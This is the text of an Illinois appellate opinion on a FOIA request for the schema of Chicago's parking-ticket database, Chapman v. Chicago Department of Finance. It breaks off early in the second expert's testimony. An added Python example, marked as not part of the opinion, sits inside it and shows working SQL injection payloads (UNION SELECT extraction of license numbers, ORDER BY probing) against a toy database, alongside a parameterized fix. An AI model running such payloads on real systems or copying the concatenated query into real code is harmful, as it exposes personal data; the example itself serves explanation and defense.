Chapman v. Chi. Dep't of Fin.

Decision Date: 14 February 2022
Docket Number: 1-20-0547
Citation: 2022 IL App (1st) 200547, 193 N.E.3d 950, 456 Ill.Dec. 710
Parties: Matt CHAPMAN, Plaintiff-Appellee, v. The CHICAGO DEPARTMENT OF FINANCE, Defendant-Appellant.
Court: Appellate Court of Illinois

Celia Meza, Acting Corporation Counsel, of Chicago (Benna Ruth Solomon, Myriam Zreczny Kasper, and Elizabeth Mary Tisher, Assistant Corporation Counsel, of counsel), for appellant.

Joshua Burday, Matthew Topic, and Merrick Wayne, of Loevy & Loevy, of Chicago, for appellee.

JUSTICE COGHLAN delivered the judgment of the court, with opinion.

¶ 1 Following a bench trial, the trial court granted plaintiff Matt Chapman's Freedom of Information Act (FOIA) ( 5 ILCS 140/1 et seq. (West 2018)) request directed at defendant the Chicago Department of Finance (Department), seeking disclosure of an "index of the tables and columns within each table" of the Citation Administration and Adjudication System (CANVAS), a system used to store, process, and track citation information for parking tickets, speed-light camera tickets, stoplight traffic tickets, booting, and towing tickets. On appeal, the Department argues that the requested information was exempt from disclosure because it constituted a "file layout" and its dissemination "would jeopardize" the security of the CANVAS system and database. We affirm.

¶ 2 I. BACKGROUND

¶ 3 On August 30, 2018, Chapman submitted the following to the Department:

"To Whom It May Concern:
Pursuant to the Illinois Freedom of Information Act, I hereby request the following records:
An index of the tables and columns within each table of CANVAS. Please include the column data type as well.
Per the CANVAS specifications, the database in question is Oracle, so the below SQL query will likely yield the records pursuant to this request: select utc.column_name as colname, uo.object_name as tablename, utc.data_type from user_objects uo join user_tab_columns utc on uo.object_name = utc.table_name where uo.object_type = 'TABLE'
The requested documents will be made available to the general public, and this request is not being made for commercial purposes.
***
Sincerely,
Matt Chapman – Free Our Info, NFP"

On September 12, 2018, the Department notified Chapman of its decision to deny his request, stating that the requested records were exempt from disclosure because the "dissemination of [the] pieces of network information could jeopardize the security of the systems of the City of Chicago." On September 17, 2018, Chapman disputed the Department's decision, arguing that "database schemas are specifically releasable through FOIA."1 On October 2, 2018, after consulting with the City of Chicago's (City) law department, the Department reiterated its decision to deny the FOIA request.

¶ 4 On November 1, 2018, Chapman filed a complaint, asserting a "willful violation of the Freedom of Information Act, to respond to [his] Freedom of Information Act requests seeking records regarding database schema information of CANVAS, a system used to store parking ticket information." The parties filed cross-motions for summary judgment. The Department's motion included the affidavit of Bruce Coffing, chief information security officer with the City's department of innovation and technology (DoIT), attesting that the "[r]elease of the requested information, especially in combination with the information already made public about the CANVAS system, would jeopardize the security of not only the CANVAS system and database, but also the data contained therein." Chapman's motion included the affidavit of Thomas Ptacek, an information and software security "vulnerability researcher," attesting that "[w]ith respect to the security of a computer application backed by a database, knowledge of the ‘schema’—the collection of tables and their constituent columns—would, in a competently built system, be of marginal value to the adversary." Following a hearing, the trial court denied the cross-motions for summary judgment, finding a factual issue regarding the meaning of "marginal value" as stated in Ptacek's affidavit. At trial, both Coffing and Ptacek testified.

¶ 5 Coffing has worked in cybersecurity for about 22 years. He testified that the CANVAS system stores "sensitive information," consisting of "first name and last name of the primary vehicle owners and the secondary vehicle owner, driver's license numbers, addresses, whether or not there is handicap parking related to that individual, [and] information about who wrote the tickets." Coffing stated that CANVAS is a "competently built system" that was built based on the best practices in the industry.

¶ 6 Coffing also testified that he is responsible for protecting the CANVAS system from a "cyberattack," which occurs when an unauthorized user of the CANVAS system "is attempting to achieve a goal that is not in alignment for business purposes for that system." To prevent a cyberattack, "a layer of defense" is employed, consisting of "numerous controls that all build upon each other to provide a defense against adversaries." One layer of defense includes "limiting the information that's known about a system, so that the adversary has less to capture in their efforts to perform reconnaissance about the system." By restricting the information that is available, an attacker would have to be more "noisy," which alerts defenders that an attack is underway. The activity of an "attacker" who has precise information about the target system "may blend in and look like normal activity in the system." Attacks made by people with more knowledge of the system are more precise and effective than attacks made by people who are just conducting reconnaissance.

¶ 7 Coffing stated that Chapman requested a "file layout" because "table names and column names" are "the information that the database management system uses to create the structure of the database" that stores the data. He explained that using file layouts or source listings, "threat actor[s] would perform reconnaissance on a target or a system and *** would use this information to more precisely craft their attacks, again to limit the noise that they would make to limit the likelihood of them being detected." He stated that Chapman's request undermines "the layer defense" strategy because, "by addressing the information that's available on the system," more information is available "for a threat actor to perform reconnaissance again to more precisely tailor their attacks." Coffing acknowledged that Chapman's request did not seek any of the actual data in the field, such as parking ticket, red light camera, or speed camera data.

¶ 8 Coffing next explained "SQL" or "sequel for short," which stands for "structured query language" and "is the language that a database management system uses." A SQL injection is a type of cybersecurity attack. "A threat actor would attempt to use sequel to create a sequel statement, which is an instruction, and it would attempt to inject that into an existing interface that is expecting *** a field that says ‘last name’ " and then "force the system to do something that it was not intended to do" but "something that the threat actor wants the system to do." "[I]f you have more information about the database, the table names, the column names, you know where to look for what you are going after" and "you can precisely write your attack, your SQL Injection, when you are entering into that field." Regarding the CANVAS system specifically, a SQL injection is a threat because it "could allow a threat actor to gain access to the data in the system *** to exfiltrate data to find out information about *** our constituents to use for whatever purposes they have." Information in the system could also be modified, such as changing a ticket from not paid to paid, or from $500 to $1. A threat actor "could do something to delete or otherwise modify the data to make it unusable for the system and, therefore, impairing the City's ability to manage citations."

¶ 9 Coffing also explained that "Zero-day" is another type of attack and refers "to those vulnerabilities that aren't known except to the attacker *** so, therefore, the defenders don't have the opportunity to defend against them." He opined that "by making public more information about a system, it gives a threat actor more at their disposal to attempt to attack."

¶ 10 On cross-examination, Coffing agreed that the FOIA request was "for the listing of tables in the CANVAS database, what the fields are in those tables, and a general description of the type of data in each field." He explained that "if you precisely know what that field name is, then you can more precisely craft your attack and you are not going to make noise you are going to go undetected or less detected than if you don't have that information." Without the information, an attacker would have "to make some guesses" and "those inaccurate guesses are going to generate errors, they are going to generate logs," which "are the things that defenders look for to try to determine whether or not there is a threat actor in the environment." Coffing stated that "[o]ne of the things that helps us defend that system is not making this information available." He did not "want to make it easier for the bad guys and bad gals out there to attack our system and *** put our constituents’ private data at risk." According to Coffing, someone who knows any of the field names within CANVAS with the proper training could attempt to change data in the system or do any of the other attacks that he described.
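The mechanics described in the testimony above (¶¶ 8 and 10), as an added example that is not part of the opinion or the trial record: a hypothetical citation database (constructed here for illustration; it is not the CANVAS schema), a lookup on a "last name" field built once by string concatenation and once with a bound parameter, an attacker who already knows the table and column names against one who has to enumerate them, and a count of the queries and SQL errors each leaves behind for a defender to see. The `schema_index` function produces the kind of table/column/data-type listing the request asked for, using SQLite's catalog (`sqlite_master`, `pragma_table_info`) in place of Oracle's `user_tab_columns`. All table, column and function names are assumptions of this example.

```python
import sqlite3

# Constructed sample data for a hypothetical citation system (not CANVAS data).
OWNERS = [
    (1, "Doe", "ABC123", "D123-4567-8901"),
    (2, "Roe", "XYZ789", "R987-6543-2100"),
]
CITATIONS = [
    (1001, "Doe", "ABC123", 500, 0),
    (1002, "Roe", "XYZ789", 60, 1),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database standing in for a citation system."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE vehicle_owners (
            owner_id INTEGER PRIMARY KEY,
            last_name TEXT, plate TEXT, drivers_license TEXT);
        CREATE TABLE citations (
            citation_id INTEGER PRIMARY KEY,
            owner_last_name TEXT, plate TEXT, amount_due INTEGER, paid INTEGER);
        """
    )
    conn.executemany("INSERT INTO vehicle_owners VALUES (?,?,?,?)", OWNERS)
    conn.executemany("INSERT INTO citations VALUES (?,?,?,?,?)", CITATIONS)
    return conn


def schema_index(conn):
    """The records the request asked for (table, column, data type),
    produced here from SQLite's catalog rather than Oracle's user_tab_columns."""
    sql = ("SELECT m.name, p.name, p.type FROM sqlite_master AS m "
           "JOIN pragma_table_info(m.name) AS p WHERE m.type = 'table' "
           "ORDER BY m.name, p.cid")
    return conn.execute(sql).fetchall()


def vulnerable_lookup(conn, last_name):
    """The 'last name' field described in testimony, built by string concatenation."""
    sql = ("SELECT citation_id, amount_due, paid FROM citations "
           f"WHERE owner_last_name = '{last_name}'")
    return conn.execute(sql).fetchall()


def safe_lookup(conn, last_name):
    """Same lookup with a bound parameter: the input is never parsed as SQL."""
    sql = "SELECT citation_id, amount_due, paid FROM citations WHERE owner_last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


class AuditLog:
    """Counts what a defender would see: queries executed and SQL errors raised."""
    def __init__(self):
        self.queries = 0
        self.errors = 0

    def run(self, lookup, conn, payload):
        self.queries += 1
        try:
            return lookup(conn, payload)
        except sqlite3.Error:
            self.errors += 1   # a failed guess becomes an error in the log
            return None


def informed_attack(lookup, conn):
    """Attacker who already knows table and column names: one exact UNION query."""
    log = AuditLog()
    payload = ("x' UNION SELECT last_name, drivers_license, plate "
               "FROM vehicle_owners --")
    rows = log.run(lookup, conn, payload)
    return rows, log


def blind_attack(lookup, conn):
    """Attacker without the schema: probe the column count with ORDER BY,
    then read table definitions from the catalog before any data query is possible."""
    log = AuditLog()
    width = None
    for n in range(1, 10):
        if log.run(lookup, conn, f"x' ORDER BY {n} --") is None:
            width = n - 1   # the first failing ORDER BY reveals the column count
            break
    if not width:
        return [], log
    cols = ", ".join(["name", "sql"] + ["'1'"] * (width - 2))
    payload = f"x' UNION SELECT {cols} FROM sqlite_master WHERE type = 'table' --"
    rows = log.run(lookup, conn, payload) or []
    return rows, log
```

Against the concatenated query the informed attacker reaches the driver's-license column in a single error-free request, while the blind attacker spends several probes and triggers a SQL error before it can even read the catalog; those extra requests and errors are the "noise" the defender's testimony refers to. Against the parameterized query both attackers receive an empty result set regardless of what they know about the schema, which is the sense in which schema knowledge matters little to a system that binds its inputs.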

¶ 11 Ptacek testified that he has worked in the information and software security field for 25 years. As a "vulnerability researcher," he looks for and helps fix identified vulnerabilities in systems. In other words, he "hacks systems for a living." Ptacek has never worked with the CANVAS system, but his general statements "apply to virtually any application built on these types of technologies."

¶ 12 Ptacek...
